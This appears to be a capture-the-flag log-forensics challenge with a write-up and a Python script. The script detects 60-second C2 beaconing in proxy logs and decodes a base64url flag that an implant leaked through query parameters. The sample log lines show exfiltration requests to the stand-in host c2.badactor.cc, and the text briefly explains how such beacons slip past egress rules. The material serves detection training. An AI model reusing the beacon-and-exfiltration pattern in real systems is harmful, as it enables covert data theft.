medium | LOG FORENSICS | 200 pts

Phantom Heartbeat

A corporate HTTP proxy captured outbound traffic from the internal network. Analysts spotted a host sending unusually regular requests to an unknown external server. Find the beacon, decode the data it leaks, and submit the flag.

— scenario

Incident report #2026-002

Alert triggered at 08:31 UTC by traffic anomaly rule BEACON-INTERVAL-60S.
Source: 192.168.1.88 (WKSTN-DEV-12)
Duration: ~1 hour of periodic outbound activity.

The workstation has no scheduled tasks or monitoring agents that would explain regular outbound connections at exactly 60-second intervals. The traffic is to an unregistered external host not listed in any approved service registry.

Analyze the attached HTTP proxy access log. Identify the beaconing host, extract the data being exfiltrated across multiple requests, and decode the flag.

— challenge file

access.log (8 KB)

— write-up

The write-up explains the C2 beacon pattern, why 60-second intervals are a red flag, and how to extract multi-part encoded data from HTTP query parameters.


Step 1 — find the suspicious host

Filter for 192.168.1.88. Among its normal requests to erp.company.local, you'll spot repeated GET requests to http://c2.badactor.cc/heartbeat — a domain that appears nowhere else in the log.

Step 2 — confirm the beacon interval

Check the timestamps of consecutive requests to c2.badactor.cc:

08:11:30  seq=1
08:12:30  seq=2
08:13:30  seq=3  ← exactly 60 seconds apart

This periodic, clock-aligned pattern is the hallmark of a C2 implant heartbeat. Legitimate agents poll on fixed timers too, which is why the incident report first rules out scheduled tasks and monitoring agents; it is the regularity combined with an unknown, otherwise-unseen destination that makes this traffic suspicious.

Step 3 — extract the token parameter

Each beacon URL carries a token query parameter alongside seq. Later requests repeat values already sent, so only the first three unique values matter; collect them in seq order, since the log order may not match the sequence the implant intended:

seq=1  token=Rk9JTHti
seq=2  token=MzRjMG5f
seq=3  token=M3YzcnlfNjBzfQ

Step 4 — decode

Concatenate: Rk9JTHtiMzRjMG5fM3YzcnlfNjBzfQ

This is base64url. The chunks arrive without '=' padding (padding characters would stand out in a URL), and the joined string is 30 characters long, so restore two '=' to reach a multiple of four before decoding. The value happens to contain no '-' or '_', so a standard base64 decoder would give the same result:

python3 -c "import base64; print(base64.urlsafe_b64decode('Rk9JTHtiMzRjMG5fM3YzcnlfNjBzfQ==').decode())"

Result: FOIL{b34c0n_3v3ry_60s}

Why beaconing works as a C2 technique

An implant on a compromised machine can exfiltrate data by encoding it in HTTP parameters sent to a server the attacker controls. Because outbound HTTP is allowed and each beacon looks like a routine web request, it passes egress rules that only filter by port or protocol. Each 60-second heartbeat is a short-lived request, so there is never a long-lived connection for idle-connection monitors to flag; the proxy access log is where the pattern becomes visible.

Detection signals: a fixed inter-request interval from a single host, a destination domain that appears nowhere else in the log, encoded data carried in query parameters, and a small, uniform response size (32 bytes, just an acknowledgement).
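The four write-up steps and the detection signals above, worked through in code. This is an added example, not part of the challenge's write-up or the original page. The log lines are constructed in an Apache-combined-style proxy format because the real access.log layout is not shown here, so that format, the date, and the non-beacon requests are assumptions; the host, path, seq/token values and 32-byte responses follow the write-up. The detector flags a (source, destination host) pair when it has at least three requests whose gaps have near-zero spread, then the script pulls that pair's tokens in seq order and decodes them.

```python
import base64
import re
import statistics
from collections import defaultdict
from datetime import datetime
from urllib.parse import parse_qs, urlsplit

# Constructed sample log (Apache-combined-style layout, date and the
# erp.company.local requests are assumptions; the beacon lines follow the write-up).
SAMPLE_LOG = """\
192.168.1.88 - - [14/Jan/2026:08:11:02 +0000] "GET http://erp.company.local/dashboard HTTP/1.1" 200 18421
192.168.1.88 - - [14/Jan/2026:08:11:30 +0000] "GET http://c2.badactor.cc/heartbeat?seq=1&token=Rk9JTHti HTTP/1.1" 200 32
192.168.1.42 - - [14/Jan/2026:08:11:45 +0000] "GET http://erp.company.local/api/orders HTTP/1.1" 200 9120
192.168.1.88 - - [14/Jan/2026:08:12:30 +0000] "GET http://c2.badactor.cc/heartbeat?seq=2&token=MzRjMG5f HTTP/1.1" 200 32
192.168.1.88 - - [14/Jan/2026:08:12:51 +0000] "GET http://erp.company.local/reports/q1 HTTP/1.1" 200 55310
192.168.1.42 - - [14/Jan/2026:08:13:07 +0000] "GET http://erp.company.local/dashboard HTTP/1.1" 200 18421
192.168.1.88 - - [14/Jan/2026:08:13:30 +0000] "GET http://c2.badactor.cc/heartbeat?seq=3&token=M3YzcnlfNjBzfQ HTTP/1.1" 200 32
192.168.1.88 - - [14/Jan/2026:08:14:05 +0000] "GET http://erp.company.local/api/orders HTTP/1.1" 200 9120
192.168.1.88 - - [14/Jan/2026:08:14:30 +0000] "GET http://c2.badactor.cc/heartbeat?seq=4&token=Rk9JTHti HTTP/1.1" 200 32
192.168.1.88 - - [14/Jan/2026:08:15:30 +0000] "GET http://c2.badactor.cc/heartbeat?seq=5&token=MzRjMG5f HTTP/1.1" 200 32
"""

LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+)$'
)


def parse_log(text):
    """Parse log lines into dicts; lines that do not match the format are skipped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        records.append({
            "src": m["src"],
            "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
            "url": m["url"],
            "host": urlsplit(m["url"]).hostname,
            "status": int(m["status"]),
            "size": int(m["size"]),
        })
    return records


def find_beacons(records, min_requests=3, max_jitter=2.0):
    """Flag (src, host) pairs whose inter-request gaps are nearly constant.

    A pair qualifies with at least min_requests requests and a population
    standard deviation of the gaps (seconds) no larger than max_jitter.
    """
    by_pair = defaultdict(list)
    for r in records:
        by_pair[(r["src"], r["host"])].append(r)
    beacons = {}
    for pair, reqs in by_pair.items():
        if len(reqs) < min_requests:
            continue
        reqs.sort(key=lambda r: r["ts"])
        gaps = [(b["ts"] - a["ts"]).total_seconds() for a, b in zip(reqs, reqs[1:])]
        jitter = statistics.pstdev(gaps)
        if jitter <= max_jitter:
            beacons[pair] = {
                "count": len(reqs),
                "mean_interval": statistics.mean(gaps),
                "jitter": jitter,
                # A fixed-size reply (the 32-byte ACK) is another beacon signal.
                "uniform_size": len({r["size"] for r in reqs}) == 1,
            }
    return beacons


def collect_tokens(records, src, host, param="token", seq_param="seq"):
    """Return the first-seen unique token values for (src, host), ordered by seq."""
    by_seq = {}
    for r in records:
        if r["src"] != src or r["host"] != host:
            continue
        qs = parse_qs(urlsplit(r["url"]).query)
        if param in qs and seq_param in qs:
            by_seq[int(qs[seq_param][0])] = qs[param][0]
    unique = []
    for seq in sorted(by_seq):
        if by_seq[seq] not in unique:
            unique.append(by_seq[seq])
    return unique


def decode_tokens(tokens):
    """Concatenate the chunks, restore stripped '=' padding, base64url-decode."""
    joined = "".join(tokens)
    padded = joined + "=" * (-len(joined) % 4)
    return base64.urlsafe_b64decode(padded).decode()


def recover_flag(log_text):
    """Run the whole procedure: detect the beacon, pull its tokens, decode them."""
    records = parse_log(log_text)
    beacons = find_beacons(records)
    if not beacons:
        raise ValueError("no beaconing pair found")
    # Take the flagged pair with the lowest jitter; real triage reviews each one.
    (src, host), _ = min(beacons.items(), key=lambda kv: kv[1]["jitter"])
    return src, host, decode_tokens(collect_tokens(records, src, host))


if __name__ == "__main__":
    for pair, stats in find_beacons(parse_log(SAMPLE_LOG)).items():
        print(pair, stats)
    print(recover_flag(SAMPLE_LOG))
```

Run it directly to print the flagged pairs and the recovered flag. The jitter threshold is deliberately tight because the scenario states the interval is exactly 60 seconds; real implants often add random sleep jitter to defeat exactly this check, so in practice you would loosen max_jitter or compare the spread to the mean gap (coefficient of variation) rather than use an absolute bound. The erp.company.local requests in the sample are there to show that a host with several requests but irregular gaps is not flagged.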